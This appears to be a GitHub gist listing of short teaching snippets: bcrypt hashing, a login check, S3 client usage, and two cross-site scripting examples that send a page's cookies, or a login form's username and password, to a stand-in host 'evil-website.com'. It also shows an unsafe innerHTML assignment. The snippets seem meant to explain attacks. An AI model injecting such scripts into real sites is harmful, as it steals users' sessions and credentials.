K-Mistele
/ forum_example.js
Created
January 15, 2021 21:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // capture the cookies | |
| const cookie = document.cookie; | |
| // send the cookies to the attacker | |
| fetch('https://evil-website.com/cookie-capture', { | |
| data: cookie | |
| }); |
K-Mistele
/ login_page_example.js
Created
January 15, 2021 21:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // add an event listener to the form | |
| const form_element = document.getElementsByTagName('form')[0]; | |
| form_element.addEventListener('submit', () => { | |
| // capture the username and password from the form | |
| const username = document.getElementById('username_input').value; | |
| const password = document.getElementById('password_input').value; | |
| // send the username and password to the attacker | |
| fetch(`https://evil-website.com/password-capture/?u=${username}&p=${password}`); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const username = document.getElementById('username_input'); | |
| const username_box = document.getElementById('username_box'); | |
| user_name_box.innerHTML = username; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import bcrypt | |
| # this will create the hash that you need to store in your database | |
| def create_bcrypt_hash(password): | |
| # convert the string to bytes | |
| password_bytes = password.encode() | |
| # generate a salt | |
| salt = bcrypt.gensalt(14) | |
| # calculate a hash as bytes | |
| password_hash_bytes = bcrypt.hashpw(password_bytes, salt) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def login(username, password): | |
| user = Users.get(username) # fetch the user record from the database | |
| # if no user matches the username, don't log them in | |
| if not user: | |
| return False | |
| # hash the supplied password | |
| supplied_hash = some_hash_function(password) |
K-Mistele
/ blob_example.py
Created
December 22, 2020 22:29
Example of storing large blobs of data with the Bucket API
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import s3_bucket as S3 | |
| import os | |
| # get your key data from environment variables | |
| AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID') | |
| AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY') | |
| # initialize the package | |
| S3.Bucket.prepare(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY) |
K-Mistele
/ upload_example.py
Created
December 22, 2020 22:28
An example of uploading and downloading files with the Bucket API
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import s3_bucket as S3 | |
| import os | |
| # get your key data from environment variables | |
| AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID') | |
| AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY') | |
| # initialize the package | |
| S3.Bucket.prepare(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| try: | |
| bucket = S3.Bucket('my-bucket-name') | |
| data, metadata = bucket.get('some key') | |
| except S3.Exceptions.NoSuchBucket as e: | |
| # some error handling here | |
| pass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bucket = S3.Bucket('your bucket name') | |
| #example | |
| bucket = S3.Bucket('my-website-data') |
K-Mistele
/ example.py
Created
December 22, 2020 22:21
An example of the AWS S3 Client I wrote for CodeLighthouse
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import s3_bucket as S3 | |
| import os | |
| # get your key data from environment variables | |
| AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID') | |
| AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY') | |
| # initialize the package | |
| S3.Bucket.prepare(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY) |